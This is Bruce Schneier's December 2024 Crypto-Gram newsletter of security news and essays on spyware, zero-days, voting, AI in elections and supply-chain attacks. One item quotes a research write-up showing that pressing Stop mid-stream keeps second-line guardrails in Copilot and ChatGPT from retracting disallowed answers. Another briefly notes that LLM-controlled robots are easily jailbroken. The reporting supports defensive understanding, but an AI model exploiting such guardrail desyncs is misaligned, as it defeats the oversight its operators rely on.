Crypto-Gram

December 15, 2024

by Bruce Schneier
Fellow and Lecturer, Harvard Kennedy School
schneier@schneier.com
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram’s web page.

These same essays and news items appear in the Schneier on Security blog, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:

  1. Good Essay on the History of Bad Password Policies
  2. Most of 2023’s Top Exploited Vulnerabilities Were Zero-Days
  3. Why Italy Sells So Much Spyware
  4. Steve Bellovin’s Retirement Talk
  5. Secret Service Tracking People’s Locations without Warrant
  6. The Scale of Geoblocking by Nation
  7. Security Analysis of the MERGE Voting Protocol
  8. What Graykey Can and Can’t Unlock
  9. NSO Group Spies on People on Behalf of Governments
  10. Race Condition Attacks against LLMs
  11. Details about the iOS Inactivity Reboot Feature
  12. Algorithms Are Coming for Democracy—but It’s Not All Bad
  13. AI and the 2024 Elections
  14. Detecting Pegasus Infections
  15. Trust Issues in AI
  16. Full-Face Masks to Frustrate Identification
  17. Jailbreaking LLM-Controlled Robots
  18. Ultralytics Supply-Chain Attack
  19. Upcoming Speaking Events

Good Essay on the History of Bad Password Policies

[2024.11.15] Stuart Schechter makes some good points on the history of bad password policies:

Morris and Thompson’s work brought much-needed data to highlight a problem that lots of people suspected was bad, but that had not been studied scientifically. Their work was a big step forward, if not for two mistakes that would impede future progress in improving passwords for decades.

First, was Morris and Thompson’s confidence that their solution, a password policy, would fix the underlying problem of weak passwords. They incorrectly assumed that if they prevented the specific categories of weakness that they had noted, that the result would be something strong. After implementing a requirement that password have multiple characters sets or more total characters, they wrote:

These improvements make it exceedingly difficult to find any individual password. The user is warned of the risks and if he cooperates, he is very safe indeed.

As should be obvious now, a user who chooses “p@ssword” to comply with policies such as those proposed by Morris and Thompson is not very safe indeed. Morris and Thompson assumed their intervention would be effective without testing its efficacy, considering its unintended consequences, or even defining a metric of success to test against. Not only did their hunch turn out to be wrong, but their second mistake prevented anyone from proving them wrong.

That second mistake was convincing sysadmins to hash passwords, so there was no way to evaluate how secure anyone’s password actually was. And it wasn’t until hackers started stealing and publishing large troves of actual passwords that we got the data: people are terrible at generating secure passwords, even with rules.


Most of 2023’s Top Exploited Vulnerabilities Were Zero-Days

[2024.11.18] Zero-day vulnerabilities are more commonly used, according to the Five Eyes:

Key Findings

In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.

Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.


Why Italy Sells So Much Spyware

[2024.11.19] Interesting analysis:

Although much attention is given to sophisticated, zero-click spyware developed by companies like Israel’s NSO Group, the Italian spyware marketplace has been able to operate relatively under the radar by specializing in cheaper tools. According to an Italian Ministry of Justice document, as of December 2022 law enforcement in the country could rent spyware for €150 a day, regardless of which vendor they used, and without the large acquisition costs which would normally be prohibitive.

As a result, thousands of spyware operations have been carried out by Italian authorities in recent years, according to a report from Riccardo Coluccini, a respected Italian journalist who specializes in covering spyware and hacking.

Italian spyware is cheaper and easier to use, which makes it more widely used. And Italian companies have been in this market for a long time.


Steve Bellovin’s Retirement Talk

[2024.11.20] Steve Bellovin is retiring. Here’s his retirement talk, reflecting on his career and what the cybersecurity field needs next.


Secret Service Tracking People’s Locations without Warrant

[2024.11.21] This feels important:

The Secret Service has used a technology called Locate X which uses location data harvested from ordinary apps installed on phones. Because users agreed to an opaque terms of service page, the Secret Service believes it doesn’t need a warrant.


The Scale of Geoblocking by Nation

[2024.11.22] Interesting analysis:

We introduce and explore a little-known threat to digital equality and freedomwebsites geoblocking users in response to political risks from sanctions. U.S. policy prioritizes internet freedom and access to information in repressive regimes. Clarifying distinctions between free and paid websites, allowing trunk cables to repressive states, enforcing transparency in geoblocking, and removing ambiguity about sanctions compliance are concrete steps the U.S. can take to ensure it does not undermine its own aims.

The paper: “Digital Discrimination of Users in Sanctioned States: The Case of the Cuba Embargo”:

Abstract: We present one of the first in-depth and systematic end-user centered investigations into the effects of sanctions on geoblocking, specifically in the case of Cuba. We conduct network measurements on the Tranco Top 10K domains and complement our findings with a small-scale user study with a questionnaire. We identify 546 domains subject to geoblocking across all layers of the network stack, ranging from DNS failures to HTTP(S) response pages with a variety of status codes. Through this work, we discover a lack of user-facing transparency; we find 88% of geoblocked domains do not serve informative notice of why they are blocked. Further, we highlight a lack of measurement-level transparency, even among HTTP(S) blockpage responses. Notably, we identify 32 instances of blockpage responses served with 200 OK status codes, despite not returning the requested content. Finally, we note the inefficacy of current improvement strategies and make recommendations to both service providers and policymakers to reduce Internet fragmentation.


Security Analysis of the MERGE Voting Protocol

[2024.11.25] Interesting analysis: An Internet Voting System Fatally Flawed in Creative New Ways.

Abstract: The recently published “MERGE” protocol is designed to be used in the prototype CAC-vote system. The voting kiosk and protocol transmit votes over the internet and then transmit voter-verifiable paper ballots through the mail. In the MERGE protocol, the votes transmitted over the internet are used to tabulate the results and determine the winners, but audits and recounts use the paper ballots that arrive in time. The enunciated motivation for the protocol is to allow (electronic) votes from overseas military voters to be included in preliminary results before a (paper) ballot is received from the voter. MERGE contains interesting ideas that are not inherently unsound; but to make the system trustworthy—to apply the MERGE protocol—would require major changes to the laws, practices, and technical and logistical abilities of U.S. election jurisdictions. The gap between theory and practice is large and unbridgeable for the foreseeable future. Promoters of this research project at DARPA, the agency that sponsored the research, should acknowledge that MERGE is internet voting (election results rely on votes transmitted over the internet except in the event of a full hand count) and refrain from claiming that it could be a component of trustworthy elections without sweeping changes to election law and election administration throughout the U.S.


What Graykey Can and Can’t Unlock

[2024.11.26] This is from 404 Media:

The Graykey, a phone unlocking and forensics tool that is used by law enforcement around the world, is only able to retrieve partial data from all modern iPhones that run iOS 18 or iOS 18.0.1, which are two recently released versions of Apple’s mobile operating system, according to documents describing the tool’s capabilities in granular detail obtained by 404 Media. The documents do not appear to contain information about what Graykey can access from the public release of iOS 18.1, which was released on October 28.

More information:

Meanwhile, Graykey’s performance with Android phones varies, largely due to the diversity of devices and manufacturers. On Google’s Pixel lineup, Graykey can only partially access data from the latest Pixel 9 when in an “After First Unlock” (AFU) state—where the phone has been unlocked at least once since being powered on.


NSO Group Spies on People on Behalf of Governments

[2024.11.27] The Israeli company NSO Group sells Pegasus spyware to countries around the world (including countries like Saudi Arabia, UAE, India, Mexico, Morocco and Rwanda). We assumed that those countries use the spyware themselves. Now we’ve learned that that’s not true: that NSO Group employees operate the spyware on behalf of their customers.

Legal documents released in ongoing US litigation between NSO Group and WhatsApp have revealed for the first time that the Israeli cyberweapons maker and not its government customers is the party that “installs and extracts” information from mobile phones targeted by the company’s hacking software.


Race Condition Attacks against LLMs

[2024.11.29] These are two attacks against the system components surrounding LLMs:

We propose that LLM Flowbreaking, following jailbreaking and prompt injection, joins as the third on the growing list of LLM attack types. Flowbreaking is less about whether prompt or response guardrails can be bypassed, and more about whether user inputs and generated model outputs can adversely affect these other components in the broader implemented system.

[…]

When confronted with a sensitive topic, Microsoft 365 Copilot and ChatGPT answer questions that their first-line guardrails are supposed to stop. After a few lines of text they halt—seemingly having “second thoughts”—before retracting the original answer (also known as Clawback), and replacing it with a new one without the offensive content, or a simple error message. We call this attack “Second Thoughts.”

[…]

After asking the LLM a question, if the user clicks the Stop button while the answer is still streaming, the LLM will not engage its second-line guardrails. As a result, the LLM will provide the user with the answer generated thus far, even though it violates system policies.

In other words, pressing the Stop button halts not only the answer generation but also the guardrails sequence. If the stop button isn’t pressed, then ‘Second Thoughts’ is triggered.

What’s interesting here is that the model itself isn’t being exploited. It’s the code around the model:

By attacking the application architecture components surrounding the model, and specifically the guardrails, we manipulate or disrupt the logical chain of the system, taking these components out of sync with the intended data flow, or otherwise exploiting them, or, in turn, manipulating the interaction between these components in the logical chain of the application implementation.

In modern LLM systems, there is a lot of code between what you type and what the LLM receives, and between what the LLM produces and what you see. All of that code is exploitable, and I expect many more vulnerabilities to be discovered in the coming year.


Details about the iOS Inactivity Reboot Feature

[2024.12.02] I recently wrote about the new iOS feature that forces an iPhone to reboot after it’s been inactive for a longish period of time.

Here are the technical details, discovered through reverse engineering. The feature triggers after seventy-two hours of inactivity, even it is remains connected to Wi-Fi.


Algorithms Are Coming for Democracy—but It’s Not All Bad

[2024.12.03] In 2025, AI is poised to change every aspect of democratic politics—but it won’t necessarily be for the worse.

India’s prime minister, Narendra Modi, has used AI to translate his speeches for his multilingual electorate in real time, demonstrating how AI can help diverse democracies to be more inclusive. AI avatars were used by presidential candidates in South Korea in electioneering, enabling them to provide answers to thousands of voters’ questions simultaneously. We are also starting to see AI tools aid fundraising and get-out-the-vote efforts. AI techniques are starting to augment more traditional polling methods, helping campaigns get cheaper and faster data. And congressional candidates have started using AI robocallers to engage voters on issues. In 2025, these trends will continue. AI doesn’t need to be superior to human experts to augment the labor of an overworked canvasser, or to write ad copy similar to that of a junior campaign staffer or volunteer. Politics is competitive, and any technology that can bestow an advantage, or even just garner attention, will be used.

Most politics is local, and AI tools promise to make democracy more equitable. The typical candidate has few resources, so the choice may be between getting help from AI tools or getting no help at all. In 2024, a US presidential candidate with virtually zero name recognition, Jason Palmer, beat Joe Biden in a very small electorate, the American Samoan primary, by using AI-generated messaging and an online AI avatar.

At the national level, AI tools are more likely to make the already powerful even more powerful. Human + AI generally beats AI only: The more human talent you have, the more you can effectively make use of AI assistance. The richest campaigns will not put AIs in charge, but they will race to exploit AI where it can give them an advantage.

But while the promise of AI assistance will drive adoption, the risks are considerable. When computers get involved in any process, that process changes. Scalable automation, for example, can transform political advertising from one-size-fits-all into personalized demagoguing—candidates can tell each of us what they think we want to hear. Introducing new dependencies can also lead to brittleness: Exploiting gains from automation can mean dropping human oversight, and chaos results when critical computer systems go down.

Politics is adversarial. Any time AI is used by one candidate or party, it invites hacking by those associated with their opponents, perhaps to modify their behavior, eavesdrop on their output, or to simply shut them down. The kinds of disinformation weaponized by entities like Russia on social media will be increasingly targeted toward machines, too.

AI is different from traditional computer systems in that it tries to encode common sense and judgment that goes beyond simple rules; yet humans have no single ethical system, or even a single definition of fairness. We will see AI systems optimized for different parties and ideologies; for one faction not to trust the AIs of a rival faction; for everyone to have a healthy suspicion of corporate for-profit AI systems with hidden biases.

This is just the beginning of a trend that will spread through democracies around the world, and probably accelerate, for years to come. Everyone, especially AI skeptics and those concerned about its potential to exacerbate bias and discrimination, should recognize that AI is coming for every aspect of democracy. The transformations won’t come from the top down; they will come from the bottom up. Politicians and campaigns will start using AI tools when they are useful. So will lawyers, and political advocacy groups. Judges will use AI to help draft their decisions because it will save time. News organizations will use AI because it will justify budget cuts. Bureaucracies and regulators will add AI to their already algorithmic systems for determining all sorts of benefits and penalties.

Whether this results in a better democracy, or a more just world, remains to be seen. Keep watching how those in power uses these tools, and also how they empower the currently powerless. Those of us who are constituents of democracies should advocate tirelessly to ensure that we use AI systems to better democratize democracy, and not to further its worst tendencies.

This essay was written with Nathan E. Sanders, and originally appeared in Wired.


AI and the 2024 Elections

[2024.12.04] It’s been the biggest year for elections in human history: 2024 is a “super-cycle” year in which 3.7 billion eligible voters in 72 countries had the chance to go the polls. These are also the first AI elections, where many feared that deepfakes and artificial intelligence-generated misinformation would overwhelm the democratic processes. As 2024 draws to a close, it’s instructive to take stock of how democracy did.

In a Pew survey of Americans from earlier this fall, nearly eight times as many respondents expected AI to be used for mostly bad purposes in the 2024 election as those who thought it would be used mostly for good. There are real concerns and risks in using AI in electoral politics, but it definitely has not been all bad.

The dreaded “death of truth” has not materialized—at least, not due to AI. And candidates are eagerly adopting AI in many places where it can be constructive, if used responsibly. But because this all happens inside a campaign, and largely in secret, the public often doesn’t see all the details.

Connecting with voters

One of the most impressive and beneficial uses of AI is language translation, and campaigns have started using it widely. Local governments in Japan and California and prominent politicians, including India Prime Minister Narenda Modi and New York City Mayor Eric Adams, used AI to translate meetings and speeches to their diverse constituents.

Even when politicians themselves aren’t speaking through AI, their constituents might be using it to listen to them. Google rolled out free translation services for an additional 110 languages this summer, available to billions of people in real time through their smartphones.

Other candidates used AI’s conversational capabilities to connect with voters. U.S. politicians Asa Hutchinson, Dean Phillips and Francis Suarez deployed chatbots of themselves in their presidential primary campaigns. The fringe candidate Jason Palmer beat Joe Biden in the American Samoan primary, at least partly thanks to using AI-generated emails, texts, audio and video. Pakistan’s former prime minister, Imran Khan, used an AI clone of his voice to deliver speeches from prison.

Perhaps the most effective use of this technology was in Japan, where an obscure and independent Tokyo gubernatorial candidate, Takahiro Anno, used an AI avatar to respond to 8,600 questions from voters and managed to come in fifth among a highly competitive field of 56 candidates.

Nuts and bolts

AIs have been used in political fundraising as well. Companies like Quiller and Tech for Campaigns market AIs to help draft fundraising emails. Other AI systems help candidates target particular donors with personalized messages. It’s notoriously difficult to measure the impact of these kinds of tools, and political consultants are cagey about what really works, but there’s clearly interest in continuing to use these technologies in campaign fundraising.

Polling has been highly mathematical for decades, and pollsters are constantly incorporating new technologies into their processes. Techniques range from using AI to distill voter sentiment from social networking platforms—something known as “social listening“—to creating synthetic voters that can answer tens of thousands of questions. Whether these AI applications will result in more accurate polls and strategic insights for campaigns remains to be seen, but there is promising research motivated by the ever-increasing challenge of reaching real humans with surveys.

On the political organizing side, AI assistants are being used for such diverse purposes as helping craft political messages and strategy, generating ads, drafting speeches and helping coordinate canvassing and get-out-the-vote efforts. In Argentina in 2023, both major presidential candidates used AI to develop campaign posters, videos and other materials.

In 2024, similar capabilities were almost certainly used in a variety of elections around the world. In the U.S., for example, a Georgia politician used AI to produce blog posts, campaign images and podcasts. Even standard productivity software suites like those from Adobe, Microsoft and Google now integrate AI features that are unavoidable—and perhaps very useful to campaigns. Other AI systems help advise candidates looking to run for higher office.

Fakes and counterfakes

And there was AI-created misinformation and propaganda, even though it was not as catastrophic as feared. Days before a Slovakian election in 2023, fake audio discussing election manipulation went viral. This kind of thing happened many times in 2024, but it’s unclear if any of it had any real effect.

In the U.S. presidential election, there was a lot of press after a robocall of a fake Joe Biden voice told New Hampshire voters not to vote in the Democratic primary, but that didn’t appear to make much of a difference in that vote. Similarly, AI-generated images from hurricane disaster areas didn’t seem to have much effect, and neither did a stream of AI-faked celebrity endorsements or viral deepfake images and videos misrepresenting candidates’ actions and seemingly designed to prey on their political weaknesses.

AI also played a role in protecting the information ecosystem. OpenAI used its own AI models to disrupt an Iranian foreign influence operation aimed at sowing division before the U.S. presidential election. While anyone can use AI tools today to generate convincing fake audio, images and text, and that capability is here to stay, tech platforms also use AI to automatically moderate content like hate speech and extremism. This is a positive use case, making content moderation more efficient and sparing humans from having to review the worst offenses, but there’s room for it to become more effective, more transparent and more equitable.

There is potential for AI models to be much more scalable and adaptable to more languages and countries than organizations of human moderators. But the implementations to date on platforms like Meta demonstrate that a lot more work needs to be done to make these systems fair and effective.

One thing that didn’t matter much in 2024 was corporate AI developers’ prohibitions on using their tools for politics. Despite market leader OpenAI’s emphasis on banning political uses and its use of AI to automatically reject a quarter-million requests to generate images of political candidates, the company’s enforcement has been ineffective and actual use is widespread.

The genie is loose

All of these trends—both good and bad—are likely to continue. As AI gets more powerful and capable, it is likely to infiltrate every aspect of politics. This will happen whether the AI’s performance is superhuman or suboptimal, whether it makes mistakes or not, and whether the balance of its use is positive or negative. All it takes is for one party, one campaign, one outside group, or even an individual to see an advantage in automation.

This essay was written with Nathan E. Sanders, and originally appeared in The Conversation.


Detecting Pegasus Infections

[2024.12.06] This tool seems to do a pretty good job.

The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for potential compromise. But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1. These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours. Free users can use the tool once a month. iVerify’s infrastructure is built to be privacy-preserving, but to run the Mobile Threat Hunting feature, users must enter an email address so the company has a way to contact them if a scan turns up spyware—as it did in the seven recent Pegasus discoveries.


Trust Issues in AI

[2024.12.09] This essay was written with Nathan E. Sanders. It originally appeared as a response to Evgeny Morozov in Boston Review‘s forum, “The AI We Deserve.”

For a technology that seems startling in its modernity, AI sure has a long history. Google Translate, OpenAI chatbots, and Meta AI image generators are built on decades of advancements in linguistics, signal processing, statistics, and other fields going back to the early days of computing—and, often, on seed funding from the U.S. Department of Defense. But today’s tools are hardly the intentional product of the diverse generations of innovators that came before. We agree with Morozov that the “refuseniks,” as he calls them, are wrong to see AI as “irreparably tainted” by its origins. AI is better understood as a creative, global field of human endeavor that has been largely captured by U.S. venture capitalists, private equity, and Big Tech. But that was never the inevitable outcome, and it doesn’t need to stay that way.

The internet is a case in point. The fact that it originated in the military is a historical curiosity, not an indication of its essential capabilities or social significance. Yes, it was created to connect different, incompatible Department of Defense networks. Yes, it was designed to survive the sorts of physical damage expected from a nuclear war. And yes, back then it was a bureaucratically controlled space where frivolity was discouraged and commerce was forbidden.

Over the decades, the internet transformed from military project to academic tool to the corporate marketplace it is today. These forces, each in turn, shaped what the internet was and what it could do. For most of us billions online today, the only internet we have ever known has been corporate—because the internet didn’t flourish until the capitalists got hold of it.

AI followed a similar path. It was originally funded by the military, with the military’s goals in mind. But the Department of Defense didn’t design the modern ecosystem of AI any more than it did the modern internet. Arguably, its influence on AI was even less because AI simply didn’t work back then. While the internet exploded in usage, AI hit a series of dead ends. The research discipline went through multiple “winters” when funders of all kinds—military and corporate—were disillusioned and research money dried up for years at a time. Since the release of ChatGPT, AI has reached the same endpoint as the internet: it is thoroughly dominated by corporate power. Modern AI, with its deep reinforcement learning and large language models, is shaped by venture capitalists, not the military—nor even by idealistic academics anymore.

We agree with much of Morozov’s critique of corporate control, but it does not follow that we must reject the value of instrumental reason. Solving problems and pursuing goals is not a bad thing, and there is real cause to be excited about the uses of current AI. Morozov illustrates this from his own experience: he uses AI to pursue the explicit goal of language learning.

AI tools promise to increase our individual power, amplifying our capabilities and endowing us with skills, knowledge, and abilities we would not otherwise have. This is a peculiar form of assistive technology, kind of like our own personal minion. It might not be that smart or competent, and occasionally it might do something wrong or unwanted, but it will attempt to follow your every command and gives you more capability than you would have had without it.

Of course, for our AI minions to be valuable, they need to be good at their tasks. On this, at least, the corporate models have done pretty well. They have many flaws, but they are improving markedly on a timescale of mere months. ChatGPT’s initial November 2022 model, GPT-3.5, scored about 30 percent on a multiple-choice scientific reasoning benchmark called GPQA. Five months later, GPT-4 scored 36 percent; by May this year, GPT-4o scored about 50 percent, and the most recently released o1 model reached 78 percent, surpassing the level of experts with PhDs. There is no one singular measure of AI performance, to be sure, but other metrics also show improvement.

That’s not enough, though. Regardless of their smarts, we would never hire a human assistant for important tasks, or use an AI, unless we can trust them. And while we have millennia of experience dealing with potentially untrustworthy humans, we have practically none dealing with untrustworthy AI assistants. This is the area where the provenance of the AI matters most. A handful of for-profit companies—OpenAI, Google, Meta, Anthropic, among others—decide how to train the most celebrated AI models, what data to use, what sorts of values they embody, whose biases they are allowed to reflect, and even what questions they are allowed to answer. And they decide these things in secret, for their benefit.

It’s worth stressing just how closed, and thus untrustworthy, the corporate AI ecosystem is. Meta has earned a lot of press for its “open-source” family of LLaMa models, but there is virtually nothing open about them. For one, the data they are trained with is undisclosed. You’re not supposed to use LLaMa to infringe on someone else’s copyright, but Meta does not want to answer questions about whether it violated copyrights to build it. You’re not supposed to use it in Europe, because Meta has declined to meet the regulatory requirements anticipated from the EU’s AI Act. And you have no say in how Meta will build its next model.

The company may be giving away the use of LLaMa, but it’s still doing so because it thinks it will benefit from your using it. CEO Mark Zuckerberg has admitted that eventually, Meta will monetize its AI in all the usual ways: charging to use it at scale, fees for premium models, advertising. The problem with corporate AI is not that the companies are charging “a hefty entrance fee” to use these tools: as Morozov rightly points out, there are real costs to anyone building and operating them. It’s that they are built and operated for the purpose of enriching their proprietors, rather than because they enrich our lives, our wellbeing, or our society.

But some emerging models from outside the world of corporate AI are truly open, and may be more trustworthy as a result. In 2022 the research collaboration BigScience developed an LLM called BLOOM with freely licensed data and code as well as public compute infrastructure. The collaboration BigCode has continued in this spirit, developing LLMs focused on programming. The government of Singapore has built SEA-LION, an open-source LLM focused on Southeast Asian languages. If we imagine a future where we use AI models to benefit all of us—to make our lives easier, to help each other, to improve our public services—we will need more of this. These may not be “eolithic” pursuits of the kind Morozov imagines, but they are worthwhile goals. These use cases require trustworthy AI models, and that means models built under conditions that are transparent and with incentives aligned to the public interest.

Perhaps corporate AI will never satisfy those goals; perhaps it will always be exploitative and extractive by design. But AI does not have to be solely a profit-generating industry. We should invest in these models as a public good, part of the basic infrastructure of the twenty-first century. Democratic governments and civil society organizations can develop AI to offer a counterbalance to corporate tools. And the technology they build, for all the flaws it may have, will enjoy a superpower that corporate AI never will: it will be accountable to the public interest and subject to public will in the transparency, openness, and trustworthiness of its development.


Full-Face Masks to Frustrate Identification

[2024.12.10] This is going to be interesting.

It’s a video of someone trying on a variety of printed full-face masks. They won’t fool anyone for long, but will survive casual scrutiny. And they’re cheap and easy to swap.


Jailbreaking LLM-Controlled Robots

[2024.12.11] Surprising no one, it’s easy to trick an LLM-controlled robot into ignoring its safety instructions.


Ultralytics Supply-Chain Attack

[2024.12.13] Last week, we saw a supply-chain attack against the Ultralytics AI library on GitHub. A quick summary:

On December 4, a malicious version 8.3.41 of the popular AI library ultralytics—which has almost 60 million downloads—was published to the Python Package Index (PyPI) package repository. The package contained downloader code that was downloading the XMRig coinminer. The compromise of the project’s build environment was achieved by exploiting a known and previously reported GitHub Actions script injection.

Lots more details at that link. Also here.

Seth Michael Larson—the security developer in residence with the Python Software Foundation, responsible for, among other things, securing PyPi—has a good summary of what should be done next:

From this story, we can see a few places where PyPI can help developers towards a secure configuration without infringing on existing use-cases.

  • API tokens are allowed to go unused alongside Trusted Publishers. It’s valid for a project to use a mix of API tokens and Trusted Publishers because Trusted Publishers aren’t universally supported by all platforms. However, API tokens that are being unused over a period of time despite releases continuing to be published via Trusted Publishing is a strong indicator that the API token is no longer needed and can be revoked.
  • GitHub Environments are optional, but recommended, when using a GitHub Trusted Publisher. However, PyPI doesn’t fail or warn users that are using a GitHub Environment that the corresponding Trusted Publisher isn’t configured to require the GitHub Environment. This fact didn’t end up mattering for this specific attack, but during the investigation it was noticed as something easy for project maintainers to miss.

There’s also a more general “What can you do as a publisher to the Python Package Index” list at the end of the blog post.


Upcoming Speaking Events

[2024.12.14] This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security technology. To subscribe, or to read back issues, see Crypto-Gram’s web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a security guru by the Economist. He is the author of over one dozen books—including his latest, A Hacker’s Mind—as well as hundreds of articles, essays, and academic papers. His newsletter and blog are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet & Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an Advisory Board Member of the Electronic Privacy Information Center and VerifiedVoting.org. He is the Chief of Security Architecture at Inrupt, Inc.

Copyright © 2024 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.